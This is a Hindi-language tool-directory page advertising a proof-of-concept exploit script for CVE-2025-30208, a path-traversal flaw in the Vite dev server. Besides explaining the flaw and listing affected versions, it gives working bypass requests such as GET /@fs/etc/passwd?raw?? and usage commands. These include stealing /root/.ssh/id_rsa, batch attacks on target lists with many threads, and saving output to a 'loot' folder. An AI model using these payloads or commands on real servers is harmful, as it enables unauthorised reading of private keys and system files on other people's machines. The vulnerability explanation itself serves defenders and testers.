Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-30208 — transformMiddleware में Vite /@fs/ पाथ ट्रैवर्सल (CVE-2025-30208) की मनमाना फ़ाइल पढ़ने की भेद्यता के लिए शोषण स्क्रिप्ट का एक PoC। | Kitploit
उपकरण/GitHubGitHub/4xura/cve-2025-30208
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHub4xura/cve-2025-30208

CVE-2025-30208

transformMiddleware में Vite /@fs/ पाथ ट्रैवर्सल (CVE-2025-30208) की मनमाना फ़ाइल पढ़ने की भेद्यता के लिए शोषण स्क्रिप्ट का एक PoC।

रिपॉजिटरी देखें
10521 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-30208

इस एक्सप्लॉइट स्क्रिप्ट का PoC Vite की /@fs/ Path Traversal भेद्यता in transformMiddleware (CVE-2025-30208) में Arbitrary File Read के लिए है। विस्तृत विश्लेषण के लिए इस पोस्ट को देखें।

निम्नलिखित संस्करणों से पहले के संस्करणों में भेद्य है:

  • 6.2.3
  • 6.1.2
  • 6.0.12
  • 5.4.15
  • 4.5.10

अवलोकन

Vite एक लोकप्रिय ओपन-सोर्स प्रोजेक्ट है जिसे Github और इसकी आधिकारिक वेबसाइट से प्राप्त किया जा सकता है। यह विकास मोड में निरपेक्ष फ़ाइल पथों तक सीधे पहुंच की अनुमति देने के लिए एक विशेष उपसर्ग, @fs, का उपयोग करता है:

root@kitploit:~
GET /@fs/<absolute/path/to/file>

लेकिन दुरुपयोग को रोकने के लिए, Vite @fs के माध्यम से पहुंच को करता है, जैसे कॉन्फ़िगरेशन का उपयोग करके:

सीमित
root@kitploit:~
server: {
  fs: {
    allow: [path.resolve(__dirname, 'src')]
  }
}

तो सिद्धांत रूप में, अनुमत निर्देशिका के बाहर की फ़ाइलें (जैसे /etc/passwd) अवरुद्ध होनी चाहिए — भले ही कोई ../../../ जैसी चाल का उपयोग करे।

हालांकि, दोष इस बात में है कि Vite URL को कैसे पार्स और जांचता है (transformMiddleware मिडलवेयर/फ़ंक्शन के माध्यम से)। यह मिडलवेयर/फ़ंक्शन यह जांचने के लिए ensureServingAccess(url, ...) का उपयोग करता है कि /@fs/ के माध्यम से फ़ाइल अनुरोध की अनुमति थी या नहीं।

हालांकि, एक हमलावर URL में अनुगामी क्वेरी विभाजक के साथ अनुरोध तैयार कर सकता है जैसे:

root@kitploit:~
GET /@fs/etc/passwd?raw??
GET /@fs/etc/passwd?raw&url
GET /@fs/etc/passwd?import&raw??

ये रूप नियमित अभिव्यक्ति फ़िल्टर (rawRE, urlRE) और सुरक्षा जांच को बायपास कर देंगे, क्योंकि दूषित क्वेरी स्ट्रिंग अभी भी रूट तर्क से मेल खाती है। क्या हो रहा है:

  1. पथ /@fs/../../../etc/passwd है
  2. क्वेरी स्ट्रिंग raw?? है (जानबूझकर विकृत)
  3. आंतरिक रूप से, Vite अनुगामी वर्णों जैसे ? को हटाने या सामान्य करने का प्रयास करता है, और यह फ़ाइल पथ की अनुमति की जांच से पहले करता है।
  4. हालांकि, जांच क्वेरी स्ट्रिंग को सही ढंग से पार्स और मैच करने में विफल रहती है, इसलिए अनुमति सूची तर्क लागू नहीं होता है।

इसका अर्थ है:

  • अनुरोध server.fs.allow जांच को बायपास करता है।
  • Vite इसे एक वैध फ़ाइल एक्सेस अनुरोध मानता है।
  • और यदि मौजूद हो तो /etc/passwd जैसी मनमानी फ़ाइलों को पढ़ता और लौटाता है।

PoC उपयोग

मूल उपयोग

root@kitploit:~
python3 poc.py [OPTIONS]

विकल्प

Flag / OptionDescription
-u, --urlएकल लक्ष्य URL (जैसे example.com:5173)
-f, --fileलक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक URL)
-p, --pathपढ़ने का फ़ाइल सिस्टम पथ (डिफ़ॉल्ट: /etc/passwd)
-b, --bypassरूट सत्यापन को बायपास करने की क्वेरी स्ट्रिंग (डिफ़ॉल्ट: ?raw??)
--proxyप्रॉक्सी URL (जैसे http://127.0.0.1:8080)
-o, --outputएक्सप्लॉइटेशन परिणामों को सहेजने के लिए आउटपुट निर्देशिका (डिफ़ॉल्ट: results)
-t, --threadsबैच मोड के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 10)
-h, --helpसहायता संदेश दिखाएँ और बाहर निकलें

उदाहरण

एकल लक्ष्य शोषण:

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173

हम जिस फ़ाइल को लीक करना चाहते हैं उसके लिए कस्टम LFI पथ के साथ एकल लक्ष्य:

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173 -p '/root/.ssh/id_rsa'

एकाधिक लक्ष्यों के साथ बैच शोषण:

root@kitploit:~
python3 cve-2025-30208.py -f targets.txt

कस्टम बायपास क्वेरी:

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173 -b "?raw&url"

प्रॉक्सी का उपयोग करना (जैसे Burp Suite):

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173 --proxy http://127.0.0.1:8080

कस्टम आउटपुट निर्देशिका:

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173 -o ./loot

बैच मोड में थ्रेड गणना बढ़ाएँ:

root@kitploit:~
python3 cve-2025-30208.py -f targets.txt -t 50
टूल डाउनलोड करें